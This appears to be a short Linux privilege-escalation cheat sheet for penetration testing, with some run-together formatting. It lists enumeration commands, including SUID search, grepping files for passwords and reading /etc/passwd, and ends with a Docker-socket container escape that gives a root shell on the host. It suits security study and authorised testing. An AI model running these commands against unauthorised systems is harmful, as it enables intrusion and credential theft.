Escalação de Privilégios


  • Locate SUID/SGID files:

-perm +6000 -type f-perm +6000 -user root -type f(2000 = SGID, 4000 = SUID, 6000 = SUID+SGID)

  • Search by name:

-name *.log

  • Run commands on each item:

-exec grep 'password' {} \; What's the OS? What version? What architecture?

  • cat /etc/*-release

  • uname -i

  • lsb_release -a (Debian based OSs)

Who are we? Where are we?

  • id

  • pwd

Who uses the box? What users? (And which ones have a valid shell)

  • cat /etc/passwd

  • grep -vE "nologin|false" /etc/passwd

What's currently running on the box? What active network services are there?

  • ps aux

  • netstat -antup

What's installed? What kernel is being used?

  • dpkg -l (Debian based OSs)

  • rpm -qa (CentOS / openSUSE )

  • uname -a

# procurar por arquivos com permissão totalfind / -type f -perm 0777 2>/dev/null $ sudo -l # list binaries with sudo privies Dockerdocker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh

Last updated